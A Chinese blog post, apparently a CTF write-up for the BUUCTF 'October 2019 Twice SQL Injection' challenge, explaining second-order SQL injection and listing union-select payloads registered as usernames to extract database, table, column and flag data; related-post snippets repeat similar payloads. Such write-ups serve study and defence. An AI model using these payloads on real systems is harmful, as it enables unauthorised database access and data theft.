[October 2019]Twice SQL Injection

已于 2023-04-23 13:37:01 修改
阅读量734 收藏
点赞数 4
CC 4.0 BY-SA版权
文章标签: sql 数据库
于 2023-04-23 11:45:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/J_linnb/article/details/130317166
文章详细解释了二次SQL注入的原理,指出在数据仅经过初步转义后存储到数据库,然后在后续查询时未做进一步处理所导致的安全问题。通过注册和登录过程中的恶意SQL语句,展示了如何利用这种漏洞获取数据库信息,包括数据库名、表名、列名以及字段内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一. 题目是二次SQL注入,我们先了解一下二次注入原理:

二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。

二. 步骤:

1.首先我们尝试注册,登录都使用sql语句

发现并没有什么用 

接着我们进入Info界面,使用简单的sql语句,可以看到页面并没有过滤我们的关键字,但将我们的单引号转义为'\'

 2. 因此我们可以通过注册+登录,来注册恶意的用户名(就是将sql语句当用户名写入数据库中)

首先进行注册:

用户名:1' union select database()#
密码:111

 然后点击Register注册

再登录页面输入刚才注册的用户名和密码,点击login登录

 登录后可以看到爆出了数据库,数据库为ctftraining

接着重复上述操作,依次获取表名,列名,字段

 表名:

1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#

 

列名: 

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

字段: 

1' union select flag from flag#

得到flag 

J_linnb
关注
### Cause: java.sql.SQLSyntaxErrorException: Column ‘update_time‘ specified twice
知识改变命运,ヾ(◍°∇°◍)ノ゙【求关注】
07-14 1194
最近保存数据时报错
【BUUCTF】October 2019 Twice SQL Injection1及知识点整理
2401_86760082的博客
01-24 1192
二次注入知识点、爆出数据库名、爆出表名、爆出字段
October 2019 Twice SQL Injection
夜风的博客
05-16 480
这里的bs4模块,只是让结果更简介,去掉了html的标签,不要这个也没事,下载方法自己百度吧,因为我也是百度的,我自己只会pip instlal +模块名字 -i。无非就是注意自己的python版本,有时候编者用的python2编写,但你的环境是python3, 而有些模块在不同python版本的名字是不一样的。怎么说呢,我觉得这个题适合我们练习脚本的编写,方法是最简单的联合注入(union select),但需要保持会话(session)下载模块的时候无非就是注意这几点,其他没什么的。
(三)October 2019 Twice SQL Injection
qq_53856457的博客
11-11 4279
标题明说二次注入(有埋伏?),先常规二次注入测试:注册用户名:admin"# 密码:123,并登 录。(此处没有任何过滤?)(info) 进行fuzz测试,结果发现常用符号传入被转义(此页面暂时放弃) 注意还有思路:注册+登录,将sql语句当用户名写入数据库,然后登陆,使语句执行(因为第一次注册登录测试中并未对”#进行waf) 注册尝试 用户名:xxx" union select database()# 密码:123456 登录成功,但无回显,尝试其他闭合方式...
buu-October 2019 Twice SQL Injection
qaq517384的博客
10-26 612
标题朴实无华的二次注入 两个注入点,注册和改info rua' union select database() # 在注册的user处可以找到二次注入点 没有特殊的过滤,四步正常走就行 rua' union select database() # rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # rua' union select gro
BUUCTF_Web(October 2019 Twice SQL injection
2401_87524087的博客
01-19 947
当用户提交的恶意数据被存入数据库后,应用程序再把它读取出来用于生成新的SQL语句时,如果没有相应的安全措施,是有可能发生SQL注入的,这种注入就叫做二次注入。重新注册账号为admin'unionselectdatabase()#,密码123(此处此方法无用,账号必须是数字,)开发者默认存入数据库的数据都是安全的,在进行查询时,直接从数据库中取出恶意数据,没有进行进一步的检验的处理。1.注册一个用户名为:1'的用户,然后登录后在info页面发现没有数据,相当于报错。同上注册,登陆,得flag。
2025.1.18——五、Twice SQL Injection 1 二次注入|注入三爆|一点代码审计
2402_87387800的博客
01-18 612
题目来源:buuctfOctober2019TwiceSQLInjection1。
详解强大的SQL注入工具——SQLMAP
05-09
SQL注入是一种常见的网络安全攻击技术,用于攻击数据驱动的应用程序,攻击者通过在应用程序的SQL命令中插入恶意SQL代码,从而控制数据库服务器。SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞...
BUUCTF--October 2019 Twice SQL Injection
qq_46263951的博客
07-30 1233
根据题目可以知道这是一个二次注入题 注册时把我们sql语句放到username处,登录后即可看到我们想要的信息 payload为: username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select gr
SQL INJECTION注入之经典教程
06-28
关于SQL注入的两篇经典文章,国外的专业机构写的.对于有一定SQL编程经验又想了解SQL inject的人来说是不错的教程.
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
AAAAAAAAAAAA66的博客
12-21 3205
这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
Twice SQL Injection
追求卓越,技术流~
11-30 369
注册一个脏的数据,这个数据储存在数据库中,并没有执行任何结果,通过登入访问的时候,会结合sql语句执行拼接语句。注册一个账号,并且这个账号是脏数据,Username:admin’# Password:123。所以现在有一个数据用户名是admin,可能是用户。
October 2019 Twice SQL Injection 1
最新发布
03-24
<think>好的,我需要处理用户关于2019年10月Twice SQL注入漏洞的询问。首先,我要回顾已有的引用内容,确保准确提取关键点。 根据提供的引用,特别是引用[1]到[4],这个漏洞涉及二次注入。用户提到的问题需要详细描述漏洞的原理和解决方案。首先,二次注入的产生条件是什么?引用[4]提到,第一次插入数据时使用addslashes转义,但转义符“\”没有存入数据库,导致后续查询时数据被信任,从而引发注入。这可能发生在用户注册、登录或修改密码时,如引用[2]所述。 接下来,我需要整理事件的具体情况。根据引用[1]和[3],该漏洞出现在BUU CTF的题目中,涉及二次注入和MongoDB的知识。攻击步骤可能包括注册恶意用户,利用未过滤的关键字进行注入,如使用UNION SELECT获取数据库信息。 解决方案方面,引用[4]提到预防措施,比如统一过滤、使用参数化查询。此外,代码审计和权限控制也是关键点。需要将这些点分条列出,确保结构清晰。 用户还可能关心如何识别和防御二次注入,因此相关问题需要覆盖原理、防御方法、常见场景和检测方式。需要确保问题具有针对性,帮助用户深入理解。 最后,检查所有技术术语是否正确,并确保引用标注正确,比如漏洞原理部分引用[4],攻击步骤引用[3]和[2]。保持语言口语化,避免使用专业术语过多,同时确保信息准确可靠。</think>### 2019年10月Twice SQL注入漏洞分析 #### 漏洞原理 该漏洞属于**二次SQL注入**类型,核心问题在于开发者未对数据库中的“已存储的脏数据”进行二次过滤。具体机制如下: 1. **第一次输入**:用户提交数据(如注册、修改信息)时,系统仅用`addslashes`转义单引号等特殊字符,但转义后的反斜杠`\`未被存入数据库[^4]。 2. **数据存储**:原始数据(如包含单引号的恶意内容)被直接存入数据库,开发者误认为数据已安全。 3. **第二次调用**:当从数据库取出数据并拼接SQL语句时,未重新转义或验证,导致恶意内容破坏查询逻辑[^4]。 #### 漏洞触发场景(以CTF题目为例) 1. **用户注册**:攻击者注册含恶意SQL片段的用户名,例如`admin'--`(注册时单引号被转义为`admin\'--`,但存储时变为`admin'--`)[^2]。 2. **信息查询**:在后续功能(如用户信息页)调用该用户名时,直接拼接SQL语句,形成注入: ```sql SELECT * FROM users WHERE username='admin'--' AND ... ``` 此时`--`注释掉后续条件,绕过验证[^3]。 #### 漏洞利用步骤(基于引用内容) 1. **探测漏洞**:在用户信息页尝试输入`1'`,观察返回是否报错或转义行为,发现单引号被转义为`\'`但数据库存储原始值。 2. **构造Payload**:注册用户名为`1' union select ...#`,后续查询时触发UNION注入,获取数据库表名、字段等信息[^3]。 3. **数据提取**:通过联合查询提取敏感数据,例如: ```sql 1' union select group_concat(table_name) from information_schema.tables where table_schema=database()# ``` #### 解决方案 1. **输入统一过滤**:不仅在输入时转义,从数据库取出数据后也需重新验证和转义。 2. **参数化查询**:使用预处理语句(如PDO或ORM),避免直接拼接SQL。 3. **代码审计**:检查所有从数据库获取数据的操作是否可能被用于SQL拼接。 4. **权限控制**:限制数据库账户权限,避免通过注入获取高权限操作[^1]。 #### 相关防御技术对比 | 方法 | 优点 | 缺点 | |---------------|-----------------------|---------------------| | 参数化查询 | 彻底防止注入 | 需重构代码 | | 双重转义 | 兼容旧系统 | 可能影响数据一致性 | | Web应用防火墙 | 快速部署 | 无法覆盖逻辑漏洞 |
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值